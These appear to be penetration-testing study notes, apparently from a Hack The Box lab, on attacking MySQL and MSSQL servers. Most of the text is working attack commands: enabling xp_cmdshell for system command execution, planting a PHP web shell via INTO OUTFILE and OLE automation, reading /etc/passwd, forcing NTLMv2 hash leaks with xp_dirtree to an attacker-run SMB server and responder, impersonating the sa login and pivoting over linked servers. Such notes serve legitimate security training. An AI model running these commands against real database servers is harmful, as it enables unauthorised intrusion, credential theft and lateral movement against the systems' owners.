MySQL and Microsoft Sql Server (MSSQL) are relational database management systems. Databases usually store sensitive data so they are high targets.
MSSQL uses ports TCP/1433 and UDP/1434 and can sometimes operate in hidden mode on port TCP/2433. MySQL uses TCP/3306.
MSSQL supports two authentication modes:
- Windows authentication mode, the SQL server is integrated with AD.
- Mixed mode supports AD and also Username and password pairs.
MySQL supports:
- username and password
- Windows authentication (via plugin)
- etc.
Misconfigurations in SQL servers can allow us to access the service without credentials.
Connect to SQL Servers
Use the right client for the database and authentication type.
# mysql conntect to server
mysql -u julio -pPassword123 -h 10.129.20.13
# mssql connect to server
sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30
# or from linux
sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h
# or via impacket
mssqlclient.py -p 1433 julio@10.129.203.7
# authentication via a windows domain
sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -hDatabase Navigation
Use these commands after login to list databases, select a database, list tables, and dump records.
SHOW DATABASES;
-- if using sqlcmd
SELECT name FROM master.dbo.sysdatabases
GO
-- select database
USE htbusers;
--- sqlcmd
USE htbusers
GO
-- show tables
SHOW TABLES;
-- sqlcmd
SELECT table_name FROM htbusers.INFORMATION_SCHEMA.TABLES
GO
-- select all data
SELECT * FROM users;MySQL default system schemas/databases:
mysql- is the system database that contains tables that store information required by the MySQL serverinformation_schema- provides access to database metadataperformance_schema- is a feature for monitoring MySQL Server execution at a low levelsys- a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
MSSQL default system schemas/databases:
master- keeps the information for an instance of SQL Server.msdb- used by SQL Server Agent.model- a template database copied for each new database.resource- a read-only database that keeps system objects visible in every database on the server in sys schema.tempdb- keeps temporary objects for SQL queries.
MSSQL Command Execution
MSSQL support an extended stored procedure called xp_cmdshell that allows execution of system commands.
-- code execution on MSSQL
xp_cmdshell 'whoami'
GO
-- enable xp_cmdshell
-- To allow advanced options to be changed.
EXECUTE sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXECUTE sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GOMySQL Web Shell Write
MySQL does not support xp_cmdshell but we can achieve command execution if we write to a location in the file system that can execute our commands. However a system variable secure_file_priv limits the effect of data import and export operations.
-- mySQL command execution
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'
-- MySQL secure File privileges
show variables like "secure_file_priv";MSSQL OLE File Write
Use Ole Automation Procedures when enabled to write a file through MSSQL.
-- Enable Ole Automation Procedures on MSSQL
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO
-- Create a file
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GORead Local Files
Use database file-read features when permissions allow it.
-- read local files in MSSQL
1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO
-- read local files in mysql
mysql> select LOAD_FILE("/etc/passwd");Capture MSSQL Service Hash
We can steal MSSQL service hash using xp_subdirs or xp_dirtree, which use the SMB protocol to retrieve a list of child directrories under a specified parent directory from the file system.
THis authenticates to an SMB server, and forces the server to authenticate and send the NTLMv2 hash of the service account.
-- XP_DIRTREE hash stealing
1> EXEC master..xp_dirtree '\\10.10.110.17\share\ '
2> GO
-- XP_SUBDIRS hash stealing
1> EXEC master..xp_subdirs '\\10.10.110.17\share\ '
2> GO# must have an attacker controlled SMB server
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2supportImpersonate Users via MSSQL
SQL Server may have a special permission named IMPERSONATE that allows the executing user to take on the permissions of another user or login.
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO
-- verify current role
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go
-- impersonating the SA user
1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GOCommunicate with Other databases via MSSQL
MSSQL has a configured option called linked servers. Linked servers are typically configured to enabled the database engine to execute a Transact-SQL statement that include tables in another instance of SQL Server. We may be able to move laterally to another SQL server.
--- list linked servers
1> SELECT srvname, isremote FROM sysservers
2> GO
-- command execution
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO